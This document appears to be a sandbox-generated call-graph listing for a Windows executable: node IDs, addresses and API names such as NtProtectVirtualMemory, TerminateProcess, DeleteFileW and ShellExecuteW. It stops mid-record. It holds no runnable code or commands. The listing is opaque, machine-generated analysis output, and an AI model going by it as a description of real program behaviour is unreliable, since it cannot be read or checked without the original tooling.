103385->103354 103386->103356 103387->103361 103388->103363 103389->103354 103390->103354 103391->103354 103392->103354 103393->103354 103394->103354 103396 e38ed5 103395->103396 103412 e38ed2 103395->103412 103397 e38f0b 103396->103397 103398 e38edd 103396->103398 103400 e38f1d 103397->103400 103401 e76a38 103397->103401 103408 e76b1f 103397->103408 103428 e55536 26 API calls 103398->103428 103429 e4fe6f 51 API calls 103400->103429 103411 e5017b 8 API calls 103401->103411 103413 e76ab1 103401->103413 103402 e38eed 103407 e5014b 8 API calls 103402->103407 103405 e76b37 103405->103405 103409 e38ef7 103407->103409 103431 e554f3 26 API calls 103408->103431 103410 e3b329 8 API calls 103409->103410 103410->103412 103415 e76a81 103411->103415 103412->103375 103430 e4fe6f 51 API calls 103413->103430 103414 e5014b 8 API calls 103416 e76aa8 103414->103416 103415->103414 103417 e3b329 8 API calls 103416->103417 103417->103413 103419 e54da6 103418->103419 103420 e54e1b 103418->103420 103427 e54dcb 103419->103427 103432 e5f649 20 API calls _abort 103419->103432 103434 e54e2d 40 API calls 3 library calls 103420->103434 103423 e54e28 103423->103375 103424 e54db2 103433 e62b5c 26 API calls pre_c_initialization 103424->103433 103426 e54dbd 103426->103375 103427->103375 103428->103402 103429->103402 103430->103408 103431->103405 103432->103424 103433->103426 103434->103423 103435->103368 103437 e38ec0 52 API calls 103436->103437 103438 eb89ed 103437->103438 103460 eb8a32 messages 103438->103460 103474 eb9730 103438->103474 103440 eb8cde 103441 eb8eac 103440->103441 103445 eb8cec 103440->103445 103523 eb9941 59 API calls 103441->103523 103444 eb8ebb 103444->103445 103446 eb8ec7 103444->103446 103487 eb88e3 103445->103487 103446->103460 103447 e38ec0 52 API calls 103465 eb8aa6 103447->103465 103452 eb8d25 103501 e4ffe0 103452->103501 103455 eb8d5f 103509 e37e12 103455->103509 103456 eb8d45 103508 ea3fe1 81 API calls __wsopen_s 103456->103508 103459 eb8d50 GetCurrentProcess TerminateProcess 103459->103455 103460->103131 103465->103440 103465->103447 103465->103460 103506 e94ad3 8 API calls __fread_nolock 103465->103506 103507 eb8f7a 41 API calls 103465->103507 103466 eb8f22 103466->103460 103468 eb8f36 FreeLibrary 103466->103468 103467 eb8d9e 103521 eb95d8 74 API calls 103467->103521 103468->103460 103472 e3b4c8 8 API calls 103473 eb8daf 103472->103473 103473->103466 103473->103472 103522 e41ca0 8 API calls 103473->103522 103524 eb95d8 74 API calls 103473->103524 103475 e3c2c9 8 API calls 103474->103475 103476 eb974b CharLowerBuffW 103475->103476 103525 e99805 103476->103525 103480 e3bf73 8 API calls 103481 eb9787 103480->103481 103532 e3acc0 103481->103532 103483 eb979b 103484 e3adf4 8 API calls 103483->103484 103486 eb97a5 _wcslen 103484->103486 103485 eb98bb _wcslen 103485->103465 103486->103485 103544 eb8f7a 41 API calls 103486->103544 103488 eb88fe 103487->103488 103489 eb8949 103487->103489 103490 e5017b 8 API calls 103488->103490 103493 eb9af3 103489->103493 103491 eb8920 103490->103491 103491->103489 103492 e5014b 8 API calls 103491->103492 103492->103491 103494 eb9d08 messages 103493->103494 103499 eb9b17 _strcat _wcslen ___std_exception_copy 103493->103499 103494->103452 103495 e3c98d 39 API calls 103495->103499 103496 e3c63f 39 API calls 103496->103499 103497 e3ca5b 39 API calls 103497->103499 103498 e38ec0 52 API calls 103498->103499 103499->103494 103499->103495 103499->103496 103499->103497 103499->103498 103548 e9f8c5 10 API calls _wcslen 103499->103548 103502 e4fff5 103501->103502 103503 e5008d NtProtectVirtualMemory 103502->103503 103504 e5005b 103502->103504 103505 e5007b CloseHandle 103502->103505 103503->103504 103504->103455 103504->103456 103505->103504 103506->103465 103507->103465 103508->103459 103510 e37e1a 103509->103510 103511 e5014b 8 API calls 103510->103511 103512 e37e28 103511->103512 103549 e38445 103512->103549 103515 e38470 103552 e3c760 103515->103552 103517 e38480 103518 e5017b 8 API calls 103517->103518 103519 e3851c 103517->103519 103518->103519 103519->103473 103520 e41ca0 8 API calls 103519->103520 103520->103467 103521->103473 103522->103473 103523->103444 103524->103473 103526 e99825 _wcslen 103525->103526 103527 e99914 103526->103527 103528 e99919 103526->103528 103529 e9985a 103526->103529 103527->103480 103527->103486 103528->103527 103546 e4e36b 41 API calls 103528->103546 103529->103527 103545 e4e36b 41 API calls 103529->103545 103535 e3ace1 103532->103535 103543 e3accf 103532->103543 103533 e3acda __fread_nolock 103533->103483 103534 e3c2c9 8 API calls 103536 e805a3 __fread_nolock 103534->103536 103537 e3ad07 103535->103537 103538 e80557 103535->103538 103535->103543 103547 e388e8 8 API calls 103537->103547 103540 e5014b 8 API calls 103538->103540 103541 e80561 103540->103541 103542 e5017b 8 API calls 103541->103542 103542->103543 103543->103533 103543->103534 103544->103485 103545->103529 103546->103528 103547->103533 103548->103499 103550 e5014b 8 API calls 103549->103550 103551 e37e30 103550->103551 103551->103515 103553 e3c76b 103552->103553 103554 e81285 103553->103554 103559 e3c773 messages 103553->103559 103555 e5014b 8 API calls 103554->103555 103557 e81291 103555->103557 103556 e3c77a 103556->103517 103559->103556 103560 e3c7e0 8 API calls messages 103559->103560 103560->103559 103562 ea18b6 103561->103562 103563 e5014b 8 API calls 103562->103563 103564 ea18bd 103563->103564 103567 e9fcb5 103564->103567 103566 ea18f7 103566->103140 103568 e3c2c9 8 API calls 103567->103568 103569 e9fcc8 CharLowerBuffW 103568->103569 103573 e9fcdb 103569->103573 103570 e3655e 8 API calls 103570->103573 103571 e9fd19 103572 e9fd2b 103571->103572 103600 e3655e 103571->103600 103575 e5017b 8 API calls 103572->103575 103573->103570 103573->103571 103584 e9fce5 ___scrt_fastfail 103573->103584 103579 e9fd59 103575->103579 103578 e9fdb8 103581 e5014b 8 API calls 103578->103581 103578->103584 103580 e9fd7b 103579->103580 103603 e9fbed 8 API calls 103579->103603 103585 e9fe0c 103580->103585 103582 e9fdd2 103581->103582 103583 e5017b 8 API calls 103582->103583 103583->103584 103584->103566 103586 e3bf73 8 API calls 103585->103586 103587 e9fe3e 103586->103587 103588 e3bf73 8 API calls 103587->103588 103589 e9fe47 103588->103589 103590 e3bf73 8 API calls 103589->103590 103597 e9fe50 103590->103597 103591 e566f8 GetStringTypeW 103591->103597 103592 e3ad40 8 API calls 103592->103597 103593 e38577 8 API calls 103593->103597 103595 e9fe0c 40 API calls 103595->103597 103596 e56641 39 API calls 103596->103597 103597->103591 103597->103592 103597->103593 103597->103595 103597->103596 103598 ea0114 103597->103598 103599 e3bed9 8 API calls 103597->103599 103604 e56722 GetStringTypeW 103597->103604 103598->103578 103599->103597 103601 e3c2c9 8 API calls 103600->103601 103602 e36569 103601->103602 103602->103572 103603->103579 103604->103597 103606 e5017b 8 API calls 103605->103606 103607 e37afa 103606->103607 103608 e5014b 8 API calls 103607->103608 103609 e37b08 103608->103609 103609->103152 103609->103153 103611 e5014b 8 API calls 103610->103611 103612 e3894a 103611->103612 103612->103212 103614 e3bd71 103613->103614 103618 e3bd64 103613->103618 103615 e5014b 8 API calls 103614->103615 103616 e3bd7b 103615->103616 103617 e5017b 8 API calls 103616->103617 103617->103618 103618->103211 103619->103211 103621 e38a76 103620->103621 103622 e76737 103621->103622 103627 e38a80 103621->103627 103635 e4b7a2 8 API calls 103622->103635 103623 e76744 103625 e3b4c8 8 API calls 103623->103625 103626 e76762 103625->103626 103626->103626 103627->103623 103628 e38b94 103627->103628 103630 e38b9b 103627->103630 103629 e5014b 8 API calls 103628->103629 103629->103630 103630->103211 103631->103189 103632->103193 103633->103206 103634->103210 103635->103623 103637 e33996 ___scrt_fastfail 103636->103637 103652 e35f32 103637->103652 103640 e33a1c 103642 e33a3a Shell_NotifyIconW 103640->103642 103643 e740cd Shell_NotifyIconW 103640->103643 103656 e361a9 103642->103656 103645 e33a50 103645->103235 103647 e33969 103646->103647 103648 e33919 ___scrt_fastfail 103646->103648 103647->103235 103649 e33938 Shell_NotifyIconW 103648->103649 103649->103647 103650->103235 103651->103235 103653 e339eb 103652->103653 103654 e35f4e 103652->103654 103653->103640 103686 e9d11f 42 API calls 103653->103686 103654->103653 103655 e75070 DestroyIcon 103654->103655 103655->103653 103657 e361c6 103656->103657 103675 e362a8 103656->103675 103658 e37ad5 8 API calls 103657->103658 103659 e361d4 103658->103659 103660 e361e1 103659->103660 103661 e75278 LoadStringW 103659->103661 103662 e38577 8 API calls 103660->103662 103663 e75292 103661->103663 103664 e361f6 103662->103664 103667 e3bed9 8 API calls 103663->103667 103685 e36229 ___scrt_fastfail 103663->103685 103665 e36203 103664->103665 103671 e752ae 103664->103671 103665->103663 103666 e3620d 103665->103666 103687 e36b7c 103666->103687 103667->103685 103672 e752f1 103671->103672 103674 e3bf73 8 API calls 103671->103674 103671->103685 103706 e4fe6f 51 API calls 103672->103706 103673 e3628e Shell_NotifyIconW 103673->103675 103676 e752d8 103674->103676 103675->103645 103705 e9a350 9 API calls 103676->103705 103679 e75310 103681 e36b7c 8 API calls 103679->103681 103680 e752e3 103682 e37bb5 8 API calls 103680->103682 103683 e75321 103681->103683 103682->103672 103684 e36b7c 8 API calls 103683->103684 103684->103685 103685->103673 103686->103640 103688 e36b93 103687->103688 103689 e757fe 103687->103689 103707 e36ba4 103688->103707 103691 e5014b 8 API calls 103689->103691 103693 e75808 _wcslen 103691->103693 103692 e3621b 103696 e37bb5 103692->103696 103694 e5017b 8 API calls 103693->103694 103695 e75841 __fread_nolock 103694->103695 103697 e37bc7 103696->103697 103698 e7641d 103696->103698 103722 e37bd8 103697->103722 103732 e913c8 8 API calls __fread_nolock 103698->103732 103701 e37bd3 103701->103685 103702 e76427 103703 e76433 103702->103703 103704 e3bed9 8 API calls 103702->103704 103704->103703 103705->103680 103706->103679 103708 e36bb4 _wcslen 103707->103708 103709 e36bc7 103708->103709 103710 e75860 103708->103710 103717 e37d74 103709->103717 103712 e5014b 8 API calls 103710->103712 103713 e7586a 103712->103713 103715 e5017b 8 API calls 103713->103715 103714 e36bd4 __fread_nolock 103714->103692 103716 e7589a __fread_nolock 103715->103716 103718 e37d8a 103717->103718 103721 e37d85 __fread_nolock 103717->103721 103719 e5017b 8 API calls 103718->103719 103720 e76528 103718->103720 103719->103721 103720->103720 103721->103714 103723 e37c1b __fread_nolock 103722->103723 103724 e37be7 103722->103724 103723->103701 103724->103723 103725 e7644e 103724->103725 103726 e37c0e 103724->103726 103727 e5014b 8 API calls 103725->103727 103728 e37d74 8 API calls 103726->103728 103729 e7645d 103727->103729 103728->103723 103730 e5017b 8 API calls 103729->103730 103731 e76491 __fread_nolock 103730->103731 103732->103702 103734 e5014b 8 API calls 103733->103734 103735 e3424e 103734->103735 103735->103245 103736->103248 103738 ea193d 103737->103738 103753 ea1a56 103737->103753 103739 ea198a 103738->103739 103740 ea195d 103738->103740 103742 ea19a1 103738->103742 103741 e5017b 8 API calls 103739->103741 103740->103739 103743 ea1971 103740->103743 103755 ea197f __fread_nolock 103741->103755 103745 e5017b 8 API calls 103742->103745 103751 ea19be 103742->103751 103746 e5017b 8 API calls 103743->103746 103744 ea19e5 103747 e5017b 8 API calls 103744->103747 103745->103751 103746->103755 103748 ea19eb 103747->103748 103756 e4c277 8 API calls 103748->103756 103749 e5014b 8 API calls 103749->103753 103751->103743 103751->103744 103751->103755 103752 ea19f7 103757 e4f9d4 WideCharToMultiByte 103752->103757 103753->103253 103755->103749 103756->103752 103758 e4fa35 103757->103758 103759 e4f9fe 103757->103759 103766 e4fe8a 8 API calls 103758->103766 103760 e5017b 8 API calls 103759->103760 103762 e4fa05 WideCharToMultiByte 103760->103762 103765 e4fa3e 8 API calls __fread_nolock 103762->103765 103764 e4fa29 103764->103755 103765->103764 103766->103764 103768 e5017b 8 API calls 103767->103768 103769 e4c209 103768->103769 103770 e5014b 8 API calls 103769->103770 103771 e4c215 103770->103771 103771->103262 103773 e3bf73 8 API calls 103772->103773 103774 e9dc73 103773->103774 103775 e3bf73 8 API calls 103774->103775 103776 e9dc7c 103775->103776 103777 e3bf73 8 API calls 103776->103777 103778 e9dc85 103777->103778 103796 e35851 103778->103796 103783 e9dcab 103808 e3568e 103783->103808 103784 e36b7c 8 API calls 103784->103783 103786 e9dcbf FindFirstFileW 103787 e9dd4b FindClose 103786->103787 103790 e9dcde 103786->103790 103793 e9dd56 103787->103793 103788 e9dd26 FindNextFileW 103788->103790 103789 e3bed9 8 API calls 103789->103790 103790->103787 103790->103788 103790->103789 103791 e37bb5 8 API calls 103790->103791 103792 e36b7c 8 API calls 103790->103792 103791->103790 103794 e9dd17 DeleteFileW 103792->103794 103793->103283 103794->103788 103795 e9dd42 FindClose 103794->103795 103795->103793 103850 e722d0 103796->103850 103799 e35898 103802 e3bd57 8 API calls 103799->103802 103800 e3587d 103801 e38577 8 API calls 103800->103801 103803 e35889 103801->103803 103802->103803 103852 e355dc 103803->103852 103806 e9eab0 GetFileAttributesW 103807 e9dc99 103806->103807 103807->103783 103807->103784 103809 e3bf73 8 API calls 103808->103809 103810 e356a4 103809->103810 103811 e3bf73 8 API calls 103810->103811 103812 e356ac 103811->103812 103813 e3bf73 8 API calls 103812->103813 103814 e356b4 103813->103814 103815 e3bf73 8 API calls 103814->103815 103816 e356bc 103815->103816 103817 e356f0 103816->103817 103818 e74da1 103816->103818 103820 e3acc0 8 API calls 103817->103820 103819 e3bed9 8 API calls 103818->103819 103821 e74daa 103819->103821 103822 e356fe 103820->103822 103823 e3bd57 8 API calls 103821->103823 103824 e3adf4 8 API calls 103822->103824 103826 e35733 103823->103826 103825 e35708 103824->103825 103825->103826 103827 e3acc0 8 API calls 103825->103827 103828 e35754 103826->103828 103833 e74dcc 103826->103833 103843 e35778 103826->103843 103830 e35729 103827->103830 103835 e3655e 8 API calls 103828->103835 103828->103843 103829 e3acc0 8 API calls 103831 e35789 103829->103831 103832 e3adf4 8 API calls 103830->103832 103834 e3579f 103831->103834 103839 e3bed9 8 API calls 103831->103839 103832->103826 103838 e38577 8 API calls 103833->103838 103836 e357b3 103834->103836 103840 e3bed9 8 API calls 103834->103840 103837 e35761 103835->103837 103842 e357be 103836->103842 103844 e3bed9 8 API calls 103836->103844 103841 e3acc0 8 API calls 103837->103841 103837->103843 103847 e74e8c 103838->103847 103839->103834 103840->103836 103841->103843 103845 e3bed9 8 API calls 103842->103845 103849 e357c9 103842->103849 103843->103829 103844->103842 103845->103849 103846 e3655e 8 API calls 103846->103847 103847->103843 103847->103846 103856 e3ad40 8 API calls __fread_nolock 103847->103856 103849->103786 103851 e3585e GetFullPathNameW 103850->103851 103851->103799 103851->103800 103853 e355ea 103852->103853 103854 e3adf4 8 API calls 103853->103854 103855 e355fe 103854->103855 103855->103806 103856->103847 103858 eb6101 103857->103858 103863 eb614f 103857->103863 103859 e5017b 8 API calls 103858->103859 103862 eb6123 103859->103862 103860 e5014b 8 API calls 103860->103862 103862->103860 103862->103863 103873 ea1400 8 API calls 103862->103873 103863->103292 103865 ea14d2 103864->103865 103866 ea1499 103864->103866 103865->103316 103866->103865 103867 e5014b 8 API calls 103866->103867 103867->103865 103868->103317 103869->103302 103870->103317 103871->103318 103872->103317 103873->103862 103875 e9e819 103874->103875 103876 e9e830 103875->103876 103879 e9e836 103875->103879 103881 e56722 GetStringTypeW 103875->103881 103882 e5666b 39 API calls 103876->103882 103879->103061 103880->103061 103881->103875 103882->103879 103883 e865af 103884 e5014b 8 API calls 103883->103884 103885 e865b6 103884->103885 103889 e9fafb 103885->103889 103887 e865c2 103888 e9fafb 8 API calls 103887->103888 103888->103887 103890 e9fb1b 103889->103890 103891 e9fbe4 103890->103891 103892 e5017b 8 API calls 103890->103892 103891->103887 103893 e9fb57 103892->103893 103895 e9fb79 103893->103895 103897 e9fbed 8 API calls 103893->103897 103895->103891 103896 e3bed9 8 API calls 103895->103896 103896->103895 103897->103893 103898 e5f06e 103899 e5f07a CallCatchBlock 103898->103899 103900 e5f086 103899->103900 103901 e5f09b 103899->103901 103917 e5f649 20 API calls _abort 103900->103917 103911 e594fd EnterCriticalSection 103901->103911 103904 e5f08b 103918 e62b5c 26 API calls pre_c_initialization 103904->103918 103905 e5f0a7 103912 e5f0db 103905->103912 103910 e5f096 __fread_nolock 103911->103905 103920 e5f106 103912->103920 103914 e5f0e8 103915 e5f0b4 103914->103915 103940 e5f649 20 API calls _abort 103914->103940 103919 e5f0d1 LeaveCriticalSection __fread_nolock 103915->103919 103917->103904 103918->103910 103919->103910 103921 e5f114 103920->103921 103922 e5f12e 103920->103922 103951 e5f649 20 API calls _abort 103921->103951 103941 e5dcc5 103922->103941 103925 e5f119 103952 e62b5c 26 API calls pre_c_initialization 103925->103952 103927 e5f137 103948 e69789 103927->103948 103930 e5f1bf 103934 e5f1dc 103930->103934 103936 e5f1ee 103930->103936 103931 e5f23b 103932 e5f248 103931->103932 103931->103936 103954 e5f649 20 API calls _abort 103932->103954 103953 e5f41f 31 API calls 4 library calls 103934->103953 103937 e5f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 103936->103937 103955 e5f29b 30 API calls 2 library calls 103936->103955 103937->103914 103938 e5f1e6 103938->103937 103940->103915 103942 e5dce6 103941->103942 103943 e5dcd1 103941->103943 103942->103927 103956 e5f649 20 API calls _abort 103943->103956 103945 e5dcd6 103957 e62b5c 26 API calls pre_c_initialization 103945->103957 103947 e5dce1 103947->103927 103958 e69606 103948->103958 103950 e5f153 103950->103930 103950->103931 103950->103937 103951->103925 103952->103937 103953->103938 103954->103937 103955->103937 103956->103945 103957->103947 103959 e69612 CallCatchBlock 103958->103959 103960 e69632 103959->103960 103961 e6961a 103959->103961 103962 e696e6 103960->103962 103967 e6966a 103960->103967 103993 e5f636 20 API calls _abort 103961->103993 103998 e5f636 20 API calls _abort 103962->103998 103965 e6961f 103994 e5f649 20 API calls _abort 103965->103994 103966 e696eb 103999 e5f649 20 API calls _abort 103966->103999 103983 e654ba EnterCriticalSection 103967->103983 103971 e696f3 104000 e62b5c 26 API calls pre_c_initialization 103971->104000 103972 e69670 103974 e69694 103972->103974 103975 e696a9 103972->103975 103995 e5f649 20 API calls _abort 103974->103995 103984 e6970b 103975->103984 103977 e69627 __fread_nolock 103977->103950 103979 e69699 103996 e5f636 20 API calls _abort 103979->103996 103980 e696a4 103997 e696de LeaveCriticalSection __wsopen_s 103980->103997 103983->103972 103985 e65737 __wsopen_s 26 API calls 103984->103985 103986 e6971d 103985->103986 103987 e69736 SetFilePointerEx 103986->103987 103988 e69725 103986->103988 103990 e6974e GetLastError 103987->103990 103992 e6972a 103987->103992 104001 e5f649 20 API calls _abort 103988->104001 104002 e5f613 20 API calls 2 library calls 103990->104002 103992->103980 103993->103965 103994->103977 103995->103979 103996->103980 103997->103977 103998->103966 103999->103971 104000->103977 104001->103992 104002->103992 104003 e81ac5 104004 e81acd 104003->104004 104007 e3d535 104003->104007 104049 e97a87 8 API calls __fread_nolock 104004->104049 104006 e81adf 104050 e97a00 8 API calls __fread_nolock 104006->104050 104010 e5014b 8 API calls 104007->104010 104009 e81b09 104011 e40340 207 API calls 104009->104011 104012 e3d589 104010->104012 104013 e81b30 104011->104013 104033 e3c32d 104012->104033 104014 e81b44 104013->104014 104051 eb61a2 53 API calls _wcslen 104013->104051 104018 e5014b 8 API calls 104025 e3d66e messages 104018->104025 104019 e81b61 104019->104007 104052 e97a87 8 API calls __fread_nolock 104019->104052 104022 e3b4c8 8 API calls 104022->104025 104024 e81f79 104053 e956ae 8 API calls messages 104024->104053 104025->104022 104025->104024 104027 e81f94 104025->104027 104028 e3bed9 8 API calls 104025->104028 104029 e3c3ab 8 API calls 104025->104029 104030 e3d911 messages 104025->104030 104028->104025 104029->104025 104031 e3d9ac messages 104030->104031 104040 e3c3ab 104030->104040 104032 e3d9c3 104031->104032 104048 e4e30a 8 API calls messages 104031->104048 104036 e3c33d 104033->104036 104034 e3c345 104034->104018 104035 e5014b 8 API calls 104035->104036 104036->104034 104036->104035 104037 e3bf73 8 API calls 104036->104037 104038 e3c32d 8 API calls 104036->104038 104039 e3bed9 8 API calls 104036->104039 104037->104036 104038->104036 104039->104036 104041 e3c3b9 104040->104041 104047 e3c3e1 messages 104040->104047 104042 e3c3c7 104041->104042 104043 e3c3ab 8 API calls 104041->104043 104044 e3c3cd 104042->104044 104045 e3c3ab 8 API calls 104042->104045 104043->104042 104044->104047 104054 e3c7e0 8 API calls messages 104044->104054 104045->104044 104047->104031 104048->104031 104049->104006 104050->104009 104051->104019 104052->104019 104053->104027 104054->104047 104055 e5076b 104056 e50777 CallCatchBlock 104055->104056 104085 e50221 104056->104085 104058 e5077e 104059 e508d1 104058->104059 104062 e507a8 104058->104062 104123 e50baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 104059->104123 104061 e508d8 104124 e551c2 28 API calls _abort 104061->104124 104072 e507e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 104062->104072 104096 e627ed 104062->104096 104064 e508de 104125 e55174 28 API calls _abort 104064->104125 104068 e508e6 104069 e507c7 104071 e50848 104104 e50cc9 104071->104104 104072->104071 104119 e5518a 38 API calls 3 library calls 104072->104119 104074 e5084e 104108 e3331b 104074->104108 104079 e5086a 104079->104061 104080 e5086e 104079->104080 104081 e50877 104080->104081 104121 e55165 28 API calls _abort 104080->104121 104122 e503b0 13 API calls 2 library calls 104081->104122 104084 e5087f 104084->104069 104086 e5022a 104085->104086 104126 e50a08 IsProcessorFeaturePresent 104086->104126 104088 e50236 104127 e53004 10 API calls 3 library calls 104088->104127 104090 e5023b 104095 e5023f 104090->104095 104128 e62687 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 104090->104128 104092 e50248 104093 e50256 104092->104093 104129 e5302d 8 API calls 3 library calls 104092->104129 104093->104058 104095->104058 104099 e62804 104096->104099 104098 e507c1 104098->104069 104100 e62791 104098->104100 104130 e50dfc 104099->104130 104101 e627c0 104100->104101 104102 e50dfc CatchGuardHandler 5 API calls 104101->104102 104103 e627e9 104102->104103 104103->104072 104138 e526b0 104104->104138 104107 e50cef 104107->104074 104109 e33327 IsThemeActive 104108->104109 104110 e33382 104108->104110 104140 e552b3 104109->104140 104120 e50d02 GetModuleHandleW 104110->104120 104112 e33352 104146 e55319 104112->104146 104114 e33359 104153 e332e6 SystemParametersInfoW SystemParametersInfoW 104114->104153 104116 e33360 104154 e3338b 104116->104154 104118 e33368 SystemParametersInfoW 104118->104110 104119->104071 104120->104079 104121->104081 104122->104084 104123->104061 104124->104064 104125->104068 104126->104088 104127->104090 104128->104092 104129->104095 104131 e50e05 104130->104131 104132 e50e07 IsProcessorFeaturePresent 104130->104132 104131->104098 104134 e50fce 104132->104134 104137 e50f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 104134->104137 104136 e510b1 104136->104098 104137->104136 104139 e50cdc GetStartupInfoW 104138->104139 104139->104107 104141 e552bf CallCatchBlock 104140->104141 104203 e632d1 EnterCriticalSection 104141->104203 104143 e552ca pre_c_initialization 104204 e5530a 104143->104204 104145 e552ff __fread_nolock 104145->104112 104147 e55325 104146->104147 104148 e5533f 104146->104148 104147->104148 104208 e5f649 20 API calls _abort 104147->104208 104148->104114 104150 e5532f 104209 e62b5c 26 API calls pre_c_initialization 104150->104209 104152 e5533a 104152->104114 104153->104116 104155 e3339b __wsopen_s 104154->104155 104156 e3bf73 8 API calls 104155->104156 104157 e333a7 GetCurrentDirectoryW 104156->104157 104210 e34fd9 104157->104210 104159 e333ce IsDebuggerPresent 104160 e73ca3 MessageBoxA 104159->104160 104161 e333dc 104159->104161 104163 e73cbb 104160->104163 104162 e333f0 104161->104162 104161->104163 104278 e33a95 104162->104278 104314 e34176 8 API calls 104163->104314 104169 e33462 104172 e73cec SetCurrentDirectoryW 104169->104172 104173 e3346a 104169->104173 104172->104173 104174 e33475 104173->104174 104315 e91fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 104173->104315 104310 e334d3 7 API calls 104174->104310 104177 e73d07 104177->104174 104180 e73d19 104177->104180 104316 e35594 104180->104316 104181 e3347f 104184 e3396b 60 API calls 104181->104184 104187 e33494 104181->104187 104183 e73d22 104185 e3b329 8 API calls 104183->104185 104184->104187 104186 e73d30 104185->104186 104189 e73d5f 104186->104189 104190 e73d38 104186->104190 104188 e334af 104187->104188 104191 e33907 Shell_NotifyIconW 104187->104191 104193 e334b6 SetCurrentDirectoryW 104188->104193 104192 e36b7c 8 API calls 104189->104192 104194 e36b7c 8 API calls 104190->104194 104191->104188 104195 e73d5b GetForegroundWindow ShellExecuteW 104192->104195 104196 e334ca 104193->104196 104197 e73d43 104194->104197 104200 e73d90 104195->104200 104196->104118 104199 e37bb5 8 API calls 104197->104199 104201 e73d51 104199->104201 104200->104188 104202 e36b7c 8 API calls 104201->104202 104202->104195 104203->104143 104207 e63319 LeaveCriticalSection 104204->104207 104206 e55311 104206->104145 104207->104206 104208->104150 104209->104152 104211 e3bf73 8 API calls 104210->104211 104212 e34fef 104211->104212 104323 e363d7 104212->104323 104214 e3500d 104215 e3bd57 8 API calls 104214->104215 104216 e35021 104215->104216 104217 e3bed9 8 API calls 104216->104217 104218 e3502c 104217->104218 104219 e3893c 8 API calls 104218->104219 104220 e35038 104219->104220 104221 e3b329 8 API calls 104220->104221 104222 e35045 104221->104222 104223 e3be2d 39 API calls 104222->104223 104224 e35055 104223->104224 104225 e3b329 8 API calls 104224->104225 104226 e3507b 104225->104226 104227 e3be2d 39 API calls 104226->104227 104228 e3508a 104227->104228 104229 e3bf73 8 API calls 104228->104229 104230 e350a8 104229->104230 104337 e351ca 104230->104337 104233 e54d98 40 API calls 104234 e350c2 104233->104234 104235 e74b23 104234->104235 104236 e350cc 104234->104236 104237 e351ca 8 API calls 104235->104237 104238 e54d98 40 API calls 104236->104238 104239 e74b37 104237->104239 104240 e350d7 104238->104240 104243 e351ca 8 API calls 104239->104243 104240->104239 104241 e350e1 104240->104241 104242 e54d98 40 API calls 104241->104242 104244 e350ec 104242->104244 104245 e74b53 104243->104245 104244->104245 104246 e350f6 104244->104246 104248 e35594 10 API calls 104245->104248 104247 e54d98 40 API calls 104246->104247 104249 e35101 104247->104249 104250 e74b76 104248->104250 104252 e74b9f 104249->104252 104253 e3510b 104249->104253 104251 e351ca 8 API calls 104250->104251 104254 e74b82 104251->104254 104256 e351ca 8 API calls 104252->104256 104255 e3512e 104253->104255 104258 e3bed9 8 API calls 104253->104258 104257 e3bed9 8 API calls 104254->104257 104260 e74bda 104255->104260 104264 e37e12 8 API calls 104255->104264 104259 e74bbd 104256->104259 104261 e74b90 104257->104261 104262 e35121 104258->104262 104263 e3bed9 8 API calls 104259->104263 104265 e351ca 8 API calls 104261->104265 104266 e351ca 8 API calls 104262->104266 104267 e74bcb 104263->104267 104268 e3513e 104264->104268 104265->104252 104266->104255 104269 e351ca 8 API calls 104267->104269 104270 e38470 8 API calls 104268->104270 104269->104260 104271 e3514c 104270->104271 104272 e38a60 8 API calls 104271->104272 104275 e35167 104272->104275 104273 e3893c 8 API calls 104273->104275 104274 e38a60 8 API calls 104274->104275 104275->104273 104275->104274 104276 e351ab 104275->104276 104277 e351ca 8 API calls 104275->104277 104276->104159 104277->104275 104279 e33aa2 __wsopen_s 104278->104279 104280 e33abb 104279->104280 104282 e740da ___scrt_fastfail 104279->104282 104281 e35851 9 API calls 104280->104281 104283 e33ac4 104281->104283 104284 e740f6 GetOpenFileNameW 104282->104284 104349 e33a57 104283->104349 104285 e74145 104284->104285 104287 e38577 8 API calls 104285->104287 104289 e7415a 104287->104289 104289->104289 104291 e33ad9 104367 e362d5 104291->104367 104985 e33624 7 API calls 104310->104985 104312 e3347a 104313 e335b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104312->104313 104313->104181 104314->104169 104315->104177 104317 e722d0 __wsopen_s 104316->104317 104318 e355a1 GetModuleFileNameW 104317->104318 104319 e3b329 8 API calls 104318->104319 104320 e355c7 104319->104320 104321 e35851 9 API calls 104320->104321 104322 e355d1 104321->104322 104322->104183 104324 e363e4 __wsopen_s 104323->104324 104325 e38577 8 API calls 104324->104325 104326 e36416 104324->104326 104325->104326 104327 e3655e 8 API calls 104326->104327 104333 e3644c 104326->104333 104327->104326 104328 e3655e 8 API calls 104328->104333 104329 e3b329 8 API calls 104330 e36543 104329->104330 104332 e36a7c 8 API calls 104330->104332 104331 e3b329 8 API calls 104331->104333 104334 e3654f 104332->104334 104333->104328 104333->104331 104336 e3651a 104333->104336 104343 e36a7c 104333->104343 104334->104214 104336->104329 104336->104334 104338 e351f2 104337->104338 104339 e351d4 104337->104339 104340 e38577 8 API calls 104338->104340 104341 e3bed9 8 API calls 104339->104341 104342 e350b4 104339->104342 104340->104342 104341->104342 104342->104233 104344 e36a8b 104343->104344 104348 e36aac __fread_nolock 104343->104348 104347 e5017b 8 API calls 104344->104347 104345 e5014b 8 API calls 104346 e36abf 104345->104346 104346->104333 104347->104348 104348->104345 104350 e722d0 __wsopen_s 104349->104350 104351 e33a64 GetLongPathNameW 104350->104351 104352 e38577 8 API calls 104351->104352 104353 e33a8c 104352->104353 104354 e353f2 104353->104354 104355 e3bf73 8 API calls 104354->104355 104356 e35404 104355->104356 104357 e35851 9 API calls 104356->104357 104358 e3540f 104357->104358 104359 e3541a 104358->104359 104360 e74d5b 104358->104360 104362 e36a7c 8 API calls 104359->104362 104364 e74d7d 104360->104364 104403 e4e36b 41 API calls 104360->104403 104363 e35426 104362->104363 104397 e31340 104363->104397 104366 e35439 104366->104291 104404 e36679 104367->104404 104370 e75336 104529 ea36b8 104370->104529 104371 e36679 93 API calls 104374 e3630e 104371->104374 104374->104370 104377 e36316 104374->104377 104376 e75368 104380 e36322 104377->104380 104381 